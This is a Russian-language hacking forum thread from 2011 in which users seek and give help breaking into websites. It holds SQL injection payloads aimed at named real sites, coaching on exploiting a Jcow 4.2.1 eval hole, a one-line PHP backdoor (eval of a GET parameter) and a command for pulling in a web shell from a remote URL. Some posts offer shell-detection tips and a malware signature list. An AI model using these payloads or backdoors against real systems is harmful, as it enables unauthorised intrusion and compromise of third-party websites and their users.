Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    подскажите как раскрутить эту скулю?
    Code:
    http://www.euromet.ru:80/search/?search=1'
     
  2. sourcec0de

    sourcec0de Banned

    Joined:
    13 Jun 2011
    Messages:
    27
    Likes Received:
    12
    Reputations:
    7
    Там несколько запросов
    Code:
    http://www.euromet.ru/search/?search=ololo' and updatexml(0x03b,concat(0x3b,(select version())),0x03b)-- x
     
    #17822 sourcec0de, 12 Sep 2011
    Last edited: 12 Sep 2011
  3. Ochki

    Ochki Banned

    Joined:
    4 Sep 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Народ Как можно найти чужой шелл на севере ?
    Интересны варианты обнаружения посторонних шелов
     
  4. o'clock

    o'clock Elder - Старейшина

    Joined:
    16 May 2009
    Messages:
    125
    Likes Received:
    22
    Reputations:
    11
    если консоль активна, то можно например так:
    Code:
    find / -type f -size +20k -name "*.php"
    выведет все пути до фалов с маской *.php размер которых более 20 кб. т.е. всо(~22 и ~67 кб) и всякие другие.
     
  5. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    был у меня один скрипт,если найду,то выложу здесь!
    даже шелл нашёл который даёт такую функцию!
    скачать
    P.S. шелл проверь сначала!
     
    #17825 Faaax, 13 Sep 2011
    Last edited: 13 Sep 2011
  6. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    o'clock,
    а серв не за ддосишь этим?)
    Ochki,
    PhPAntiVirus скачай, он не грузить серв вообще, сколько бы там не было файлов! Открой там virus.def и измени содержимое на
    Code:
    SHELL	(base64_decode
    SHELL	eval
    SHELL	assert
    SHELL	auth_pass
    
     
    #17826 Kuteke, 13 Sep 2011
    Last edited: 13 Sep 2011
    1 person likes this.
  7. alerondel

    alerondel Member

    Joined:
    20 Apr 2011
    Messages:
    165
    Likes Received:
    9
    Reputations:
    6
    Нашел Post уязвимость на сайте
    http://mirbek-star.3dn.ru/load/audio/mirbek_atabekov_tan_syry_skachat_v_formate_mp3/1-1-0-51
    Data:id=1&a=1&ajax=370
    Что бы по быстрому добраться до базы использовал Havij и WebCruiser ни 1 не смог потому что символы там не понятные..пытается что то сблиндить и не как,есть варианты как пасс админа вытащить если символы не англ?
    Заранее спасибо.
     
    1 person likes this.
  8. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    там нет инъекции
     
    #17828 попугай, 13 Sep 2011
    Last edited: 13 Sep 2011
    2 people like this.
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    там пасивная XSS
     
    _________________________
    1 person likes this.
  10. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    alerondel,
    если сломаешь напиши в ПМ)))) А вообще как обнаружил, что есть уязвимость?

    Nightmarе,
    БД есть, но доступ не дают, насколько я помню, либо дают, но платно(дорого)!
     
  11. VertuOzz

    VertuOzz New Member

    Joined:
    8 Sep 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Помогите залить шелл

    Скрипт Jcow 4.2.1. В скрипте присутствует уязвимость - не фильтруется параметр "attachment"
    сам код:
    PHP:
    $app $_POST['attachment'];
        if (
    strlen($app) && $app != 'status') {
            include_once(
    'modules/'.$app.'/'.$app.'.php');
            
    $c_run $app.'::ajax_post();';
            eval(
    $c_run);
            exit;
        }
    есть эксплот под metasploit http://www.exploit-db.com/exploits/17722/ Сплойт коннектится к хосту, а вот, как залить шелл, ума не приложу, может кто че посоветует? Спасибо
     
  12. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    постом в переменной attachment передай phpinfo();//
     
    _________________________
  13. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Есть инъекция в INSERT INTO

    insert into TABLE (id, subid, date, data) values ('666', 'SQL', '', '')

    Можно что-нибудь извлечь из этого?
    Запрос комментариями не обрезается. MQ off
     
  14. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Вот может тебе эта статейка поможет?!
    _http://devteev.blogspot.com/2010/02/sql-injection-insert-update-delete-etc.html

    P.S: кинь ссылку в пм глянуть
     
    _________________________
    #17834 winstrool, 14 Sep 2011
    Last edited: 14 Sep 2011
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Читал уже. Проблема в том, что нельзя обрезать запрос комментарием как в статье показано.
     
  16. xa-xa89

    xa-xa89 Elder - Старейшина

    Joined:
    17 May 2008
    Messages:
    108
    Likes Received:
    27
    Reputations:
    2
    А где-то подсмотреть результаты инсерта можно?
    то почему бы просто не сделать вот так?
    insert into TABLE (id, subid, date, data) values ('666', ''+(select bla_bla_bla), '', '')
    ну и селект не из это же таблицы, помним)
     
    1 person likes this.
  17. VertuOzz

    VertuOzz New Member

    Joined:
    8 Sep 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Передавал, phpinfo отображается, а дальше чего?
     
  18. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    код выполняй!
    попробуй этот
    Code:
    eval(stripslashes($_GET[e]));
     
  19. VertuOzz

    VertuOzz New Member

    Joined:
    8 Sep 2011
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Извиняюсь за нубский вопрос, а что это даст?
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    это может дать тебе возможность выполнять пхп код, т.е если в том месте где ты вставил эту строчку срабодает пхп инфо которое можешь вызвать так "e=phpinfo();" то значит можешь удаленно попробовать залить шелл примерно так "e=cp("/folder/shell.php","http://localhost/shell.txt");" ну или на месте самой этой строчки вставить код уплодера, вообщем вариантов куча)
     
    _________________________
Thread Status:
Not open for further replies.